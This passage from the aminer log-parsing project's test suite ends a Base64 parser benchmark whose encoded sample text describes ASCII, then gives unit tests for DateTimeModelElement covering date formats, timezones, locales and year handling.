b"dGlvbnMgYXJlIHNvbWV3aGF0IG9ic2N1cmUuIElmIHNvbWVvbmUgc2F5cyB0aGV5IHdhbnQgeW91ciBDViBob3dldmVyIGluIEFTQ0lJIGZvcm1hdCwgYWx" \ b"sIHRoaXMgbWVhbnMgaXMgdGhleSB3YW50ICdwbGFpbicgdGV4dCB3aXRoIG5vIGZvcm1hdHRpbmcgc3VjaCBhcyB0YWJzLCBib2xkIG9yIHVuZGVyc2Nvcm" \ b"luZyAtIHRoZSByYXcgZm9ybWF0IHRoYXQgYW55IGNvbXB1dGVyIGNhbiB1bmRlcnN0YW5kLiBUaGlzIGlzIHVzdWFsbHkgc28gdGhleSBjYW4gZWFzaWx5I" \ b"GltcG9ydCB0aGUgZmlsZSBpbnRvIHRoZWlyIG93biBhcHBsaWNhdGlvbnMgd2l0aG91dCBpc3N1ZXMuIE5vdGVwYWQuZXhlIGNyZWF0ZXMgQVNDSUkgdGV4" \ b"dCwgb3IgaW4gTVMgV29yZCB5b3UgY2FuIHNhdmUgYSBmaWxlIGFzICd0ZXh0IG9ubHknQVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2R" \ b"lIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZXJzIGNhbiBvbmx5IHVuZGVyc3RhbmQgbnVtYmVycywgc28gYW4gQVNDSUkgY29kZSBpcy" \ b"B0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0aW9uIG9mIGEgY2hhcmFjdGVyIHN1Y2ggYXMgJ2EnIG9yICdAJyBvciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0L" \ b"iBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9uZyB0aW1lIGFnbyBhbmQgbm93IHRoZSBub24tcHJpbnRpbmcgY2hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQg" \ b"Zm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2UuIEJlbG93IGlzIHRoZSBBU0NJSSBjaGFyYWN0ZXIgdGFibGUgYW5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHR" \ b"pb25zIG9mIHRoZSBmaXJzdCAzMiBub24tcHJpbnRpbmcgY2hhcmFjdGVycy4gQVNDSUkgd2FzIGFjdHVhbGx5IGRlc2lnbmVkIGZvciB1c2Ugd2l0aCB0ZW" \ b"xldHlwZXMgYW5kIHNvIHRoZSBkZXNjcmlwdGlvbnMgYXJlIHNvbWV3aGF0IG9ic2N1cmUuIElmIHNvbWVvbmUgc2F5cyB0aGV5IHdhbnQgeW91ciBDViBob" \ b"3dldmVyIGluIEFTQ0lJIGZvcm1hdCwgYWxsIHRoaXMgbWVhbnMgaXMgdGhleSB3YW50ICdwbGFpbicgdGV4dCB3aXRoIG5vIGZvcm1hdHRpbmcgc3VjaCBh" \ b"cyB0YWJzLCBib2xkIG9yIHVuZGVyc2NvcmluZyAtIHRoZSByYXcgZm9ybWF0IHRoYXQgYW55IGNvbXB1dGVyIGNhbiB1bmRlcnN0YW5kLiBUaGlzIGlzIHV" \ b"zdWFsbHkgc28gdGhleSBjYW4gZWFzaWx5IGltcG9ydCB0aGUgZmlsZSBpbnRvIHRoZWlyIG93biBhcHBsaWNhdGlvbnMgd2l0aG91dCBpc3N1ZXMuIE5vdG" \ b"VwYWQuZXhlIGNyZWF0ZXMgQVNDSUkgdGV4dCwgb3IgaW4gTVMgV29yZCB5b3UgY2FuIHNhdmUgYSBmaWxlIGFzICd0ZXh0IG9ubHknQVNDSUkgc3RhbmRzI" \ b"GZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZXJzIGNhbiBvbmx5IHVuZGVyc3RhbmQgbnVt" \ b"YmVycywgc28gYW4gQVNDSUkgY29kZSBpcyB0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0aW9uIG9mIGEgY2hhcmFjdGVyIHN1Y2ggYXMgJ2EnIG9yICdAJyB" \ b"vciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0LiBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9uZyB0aW1lIGFnbyBhbmQgbm93IHRoZSBub24tcHJpbnRpbmcgY2" \ b"hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQgZm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2UuIEJlbG93IGlzIHRoZSBBU0NJSSBjaGFyYWN0ZXIgdGFibGUgY" \ b"W5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHRpb25zIG9mIHRoZSBmaXJzdCAzMiBub24tcHJpbnRpbmcgY2hhcmFjdGVycy4gQVNDSUkgd2FzIGFjdHVhbGx5" \ b"IGRlc2lnbmVkIGZvciB1c2Ugd2l0aCB0ZWxldHlwZXMgYW5kIHNvIHRoZSBkZXNjcmlwdGlvbnMgYXJlIHNvbWV3aGF0IG9ic2N1cmUuIElmIHNvbWVvbmU" \ b"gc2F5cyB0aGV5IHdhbnQgeW91ciBDViBob3dldmVyIGluIEFTQ0lJIGZvcm1hdCwgYWxsIHRoaXMgbWVhbnMgaXMgdGhleSB3YW50ICdwbGFpbicgdGV4dC" \ b"B3aXRoIG5vIGZvcm1hdHRpbmcgc3VjaCBhcyB0YWJzLCBib2xkIG9yIHVuZGVyc2NvcmluZyAtIHRoZSByYXcgZm9ybWF0IHRoYXQgYW55IGNvbXB1dGVyI" \ b"GNhbiB1bmRlcnN0YW5kLiBUaGlzIGlzIHVzdWFsbHkgc28gdGhleSBjYW4gZWFzaWx5IGltcG9ydCB0aGUgZmlsZSBpbnRvIHRoZWlyIG93biBhcHBsaWNh" \ b"dGlvbnMgd2l0aG91dCBpc3N1ZXMuIE5vdGVwYWQuZXhlIGNyZWF0ZXMgQVNDSUkgdGV4dCwgb3IgaW4gTVMgV29yZCB5b3UgY2FuIHNhdmUgYSBmaWxlIGF" \ b"zICd0ZXh0IG9ubHknQVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZX" \ b"JzIGNhbiBvbmx5IHVuZGVyc3RhbmQgbnVtYmVycywgc28gYW4gQVNDSUkgY29kZSBpcyB0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0aW9uIG9mIGEgY2hhc" \ b"mFjdGVyIHN1Y2ggYXMgJ2EnIG9yICdAJyBvciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0LiBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9uZyB0aW1lIGFnbyBh" \ b"bmQgbm93IHRoZSBub24tcHJpbnRpbmcgY2hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQgZm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2UuIEJlbG93IGlzIHR" \ b"oZSBBU0NJSSBjaGFyYWN0ZXIgdGFibGUgYW5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHRpb25zIG9mIHRoZSBmaXJzdCAzMiBub24tcHJpbg==" """ end_setup = """ dummy_match_context = DummyMatchContext(base64_string) dummy_match_context_list = [copy.deepcopy(dummy_match_context) for _ in range(times)] base64_dme = Base64StringModelElement("s0") def run(): match_context = dummy_match_context_list.pop(0) base64_dme.get_match_element("base64", match_context) """ _setup100 = import_setup + string100_setup + end_setup _setup4096 = import_setup + string4096_setup + end_setup # import timeit # times = 100000 # print("All text lengths are given from the original text. Base64 encoding needs 33% more characters." # " Every text length is run 100.000 times.") # t = timeit.timeit(setup=_setup100, stmt="run()", number=times) # print("Text length 100: ", t) # t = timeit.timeit(setup=_setup4096, stmt="run()", number=times) # print("Text length 4096: ", t) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/DateTimeModelElementTest.py000066400000000000000000001254411500476301700306330ustar00rootroot00000000000000import unittest import logging import pytz import locale from io import StringIO from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.MatchElement import MatchElement from aminer.parsing.MatchContext import MatchContext from unit.TestBase import TestBase, DummyMatchContext, initialize_loggers from datetime import datetime, timezone from pwd import getpwnam from grp import getgrnam class DateTimeModelElementTest(TestBase): """ Unittests for the DateTimeModelElement. To calculate the expected timestamps the timezone shift was added or subtracted from the date and the epoch was calculated on https://www.epochconverter.com/. For example the date 24.03.2018 11:40:00 CET was converted to 24.03.2018 10:40:00 UTC and then the epoch in seconds was calculated (1521888000). """ id_ = "dtme" path = "path" def test1get_match_element_with_different_date_formats(self): """Test if different date_formats can be used to match data.""" # test normal date data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test leap year date data = b"29.02.2020 11:40:00: it still works" date = b"29.02.2020 11:40:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1582976400, None) # test normal date with T data = b"07.02.2019T11:40:00: it still works" date = b"07.02.2019T11:40:00" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%YT%H:%M:%S", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test normal date with fractions data = b"07.02.2019 11:40:00.123456: it still works" date = b"07.02.2019 11:40:00.123456" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S.%f", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600.123456, None) # test normal date with z data = b"07.02.2019 11:40:00+0000: it still works" date = b"07.02.2019 11:40:00+0000" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S%z", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test normal date with z data = b"07.02.2019 11:40:00 UTC: it still works" date = b"07.02.2019 11:40:00 UTC" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test normal date with z data = b"07.02.2019 11:40:00 GMT: it still works" date = b"07.02.2019 11:40:00 GMT" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test normal date with z data = b"07.02.2019 11:40:00 UTC+01: it still works" date = b"07.02.2019 11:40:00 UTC+01" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549536000, None) # wrong timezone identifiers for offsets data = b"07.02.2019 11:40:00 CET+01: it still works" date = b"07.02.2019 11:40:00 CET" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549536000, None) data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test with only date defined data = b"07.02.2019: it still works" date = b"07.02.2019" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549497600, None) # test with only time defined. Here obviously the seconds can not be tested. data = b"11:40:23: it still works" date = b"11:40:23" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%H:%M:%S", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, match_element.match_object, None) self.assertEqual(match_element.match_string, b"11:40:23") self.assertEqual(match_context.match_string, b"11:40:23") # %s data = b"1662760597" date = b"1662760597" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%s", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1662760597, None) self.assertEqual(match_element.match_string, b"1662760597") self.assertEqual(match_context.match_string, b"1662760597") # %s with milliseconds data = b"1662760597123" date = b"1662760597123" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%s", timezone.utc, timestamp_scale=1000) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1662760597.123, None) self.assertEqual(match_element.match_string, b"1662760597123") self.assertEqual(match_context.match_string, b"1662760597123") # %s with microseconds data = b"1662760597123456" date = b"1662760597123456" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%s", timezone.utc, timestamp_scale=1e6) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1662760597.123456, None) self.assertEqual(match_element.match_string, b"1662760597123456") self.assertEqual(match_context.match_string, b"1662760597123456") def test2wrong_date(self): """Test if wrong input data does not return a match.""" # wrong day data = b"32.03.2019 11:40:00: it still works" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong month data = b"01.13.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong year data = b"01.01.00 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong date leap year data = b"29.02.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # missing T data = b"07.02.2019 11:40:00: it still works" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%YT%H:%M:%S", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # missing fractions data = b"07.02.2019 11:40:00.: it still works" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S.%f", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_with_unclean_format_string(self): """This test case checks if unclean format_strings can be used.""" data = b"Date %d: 07.02.2018 11:40:00 UTC+0000: it still works" date = b"Date %d: 07.02.2018 11:40:00 UTC+0000" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"Date %%d: %d.%m.%Y %H:%M:%S%z", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518003600, None) def test4get_match_element_with_different_time_zones(self): """Test if different time_zones work with the DateTimeModelElement.""" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S%z", timezone.utc) data = b"07.02.2018 11:40:00 UTC-1200: it still works" date = b"07.02.2018 11:40:00 UTC-1200" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 GMT-1200: it still works" date = b"07.02.2018 11:40:00 GMT-1200" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 UTC-12: it still works" date = b"07.02.2018 11:40:00 UTC-12" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 UTC-5: it still works" date = b"07.02.2018 11:40:00 UTC-5" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00 UTC-0500: it still works" date = b"07.02.2018 11:40:00 UTC-0500" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00-05:00: it still works" date = b"07.02.2018 11:40:00-05:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00 UTC+0000: it still works" date = b"07.02.2018 11:40:00 UTC+0000" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518003600, None) data = b"07.02.2018 11:40:00 UTC+0100: it still works" date = b"07.02.2018 11:40:00 UTC+0100" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518000000, None) data = b"07.02.2018 11:40:00+01:00: it still works" date = b"07.02.2018 11:40:00+01:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518000000, None) data = b"07.02.2018 11:40:00 UTC+1400: it still works" date = b"07.02.2018 11:40:00 UTC+1400" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1517953200, None) def test5get_match_element_with_different_text_locales(self): """Test if data with different text locales can be handled with different text_locale parameters.""" DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, "en_US.UTF-8") DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, "de_AT.UTF-8") DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, "de_AT.ISO-8859-1") def test6text_locale_not_installed(self): """Check if an exception is raised when the text_locale is not installed on the system.""" self.assertRaises(locale.Error, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, "af-ZA.UTF-8") def test7get_match_element_with_start_year(self): """Test if dates without year can be parsed, when the start_year is defined.""" data = b"07.02 11:40:00: it still works" date = b"07.02 11:40:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=2017) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1486467600, None) match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=2019) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) def test8get_match_element_without_start_year_defined(self): """Test if dates without year can still be parsed, even without defining the start_year.""" data = b"07.02 11:40:00: it still works" date = b"07.02 11:40:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc) match_context = DummyMatchContext(data) dtm = datetime(datetime.now().year, 2, 7, 11, 40, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, total_seconds, None) def test9get_match_element_with_leap_start_year(self): """Check if leap start_years can parse the 29th February.""" data = b"29.02 11:40:00: it still works" date = b"29.02 11:40:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=2020) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1582976400, None) def test10get_match_element_without_leap_start_year(self): """Check if normal start_years can not parse the 29th February.""" data = b"29.02 11:40:00: it still works" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=2019) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test11learn_new_start_year_with_start_year_set(self): """Test if a new year is learned successfully with the start year being set.""" data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" start_year = 2020 date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=start_year) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609459140, None) self.assertEqual(date_time_model_element.start_year, start_year) data = b"01.01 11:20:00: it still works" date = b"01.01 11:20:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609500000, None) self.assertEqual(date_time_model_element.start_year, start_year + 1) def test12learn_new_start_year_without_start_year_set(self): """Test if a new year is learned successfully with the start year being None.""" data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year, 12, 31, 23, 59, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, total_seconds, None) data = b"01.01 11:20:00: it still works" date = b"01.01 11:20:00" start_year = date_time_model_element.start_year match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year+1, 1, 1, 11, 20, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, total_seconds, None) self.assertEqual(date_time_model_element.start_year, start_year + 1) def test13max_time_jump_seconds_in_time(self): """ Test if the max_time_jump_seconds parameter works if the next date is in time. Warnings with unqualified timestamp year wraparound. """ log_stream = StringIO() logging.basicConfig(stream=log_stream, level=logging.INFO) max_time_jump_seconds = 86400 start_year = 2020 date_time_model_element = DateTimeModelElement( self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609459140, None) self.assertEqual(date_time_model_element.start_year, start_year) data = b"01.01 23:59:00: it still works" date = b"01.01 23:59:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609545540, None) self.assertEqual(date_time_model_element.start_year, start_year + 1) self.assertIn("WARNING:DEBUG:DateTimeModelElement unqualified timestamp year wraparound detected from 2021-01-01T23:59:00+00:00 to " "2021-01-01T23:59:00+00:00", log_stream.getvalue()) for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) initialize_loggers(self.aminer_config, getpwnam("aminer").pw_uid, getgrnam("aminer").gr_gid) def test14max_time_jump_seconds_exceeded(self): """ Test if the start_year is not updated, when the next date exceeds the max_time_jump_seconds. A time inconsistency warning must occur. """ log_stream = StringIO() logging.basicConfig(stream=log_stream, level=logging.INFO) max_time_jump_seconds = 86400 start_year = 2020 date_time_model_element = DateTimeModelElement( self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609459140, None) self.assertEqual(date_time_model_element.start_year, start_year) data = b"01.01 23:59:01: it still works" date = b"01.01 23:59:01" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1577923141, None) self.assertEqual(date_time_model_element.start_year, start_year) self.assertIn("WARNING:DEBUG:DateTimeModelElement time inconsistencies parsing b'01.01 23:59:01', expecting value around " "1609459140. Check your settings!", log_stream.getvalue()) date_time_model_element = DateTimeModelElement( self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) data = b"05.03 06:29:07: it still works" date = b"05.03 06:29:07" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1583389747, None) self.assertEqual(date_time_model_element.start_year, start_year) self.assertIn("WARNING:DEBUG:DateTimeModelElement time inconsistencies parsing b'01.01 23:59:01', expecting value around " "1609459140. Check your settings!", log_stream.getvalue()) data = b"29.02 07:24:02: it still works" date = b"29.02 07:24:02" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1582961042, None) self.assertEqual(date_time_model_element.start_year, start_year) for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) initialize_loggers(self.aminer_config, getpwnam("aminer").pw_uid, getgrnam("aminer").gr_gid) def test15time_change_cest_cet(self): """Check if the time change from CET to CEST and vice versa work as expected.""" data = b"24.03.2018 11:40:00 CET: it still works" date = b"24.03.2018 11:40:00 CET" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S%z", timezone.utc) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1521888000, None) # make sure format changes with longer format specifiers also work data = b"25.03.2018 11:40:00 CEST: it still works" date = b"25.03.2018 11:40:00 CEST" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1521970800, None) data = b"27.10.2018 11:40:00 CEST: it still works" date = b"27.10.2018 11:40:00 CEST" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1540633200, None) data = b"28.10.2018 11:40:00 CET: it still works" date = b"28.10.2018 11:40:00 CET" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1540723200, None) data = b"27.10.2018 11:40:00 EST: it still works" date = b"27.10.2018 11:40:00 EST" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1540658400, None) data = b"27.10.2018 11:40:00 PDT: it still works" date = b"27.10.2018 11:40:00 PDT" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1540665600, None) data = b"27.10.2018 11:40:00 GMT: it still works" date = b"27.10.2018 11:40:00 GMT" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1540640400, None) def test16same_timestamp_multiple_times(self): """Test if the DateTimeModelElement can handle multiple same timestamps.""" data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) def test17date_before_unix_timestamps(self): """Check if timestamps before the unix timestamp are processed properly.""" data = b"01.01.1900 11:40:00: it still works" date = b"01.01.1900 11:40:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, -2208946800, None) def test18element_id_input_validation(self): """Check if element_id is validated.""" date_format = b"%d.%m.%Y %H:%M:%S" self.assertRaises(ValueError, DateTimeModelElement, "", date_format) # empty element_id self.assertRaises(TypeError, DateTimeModelElement, None, date_format) # None element_id self.assertRaises(TypeError, DateTimeModelElement, b"path", date_format) # bytes element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, True, date_format) # boolean element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, 123, date_format) # integer element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, 123.22, date_format) # float element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, {"id": "path"}, date_format) # dict element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, ["path"], date_format) # list element_id is not allowed 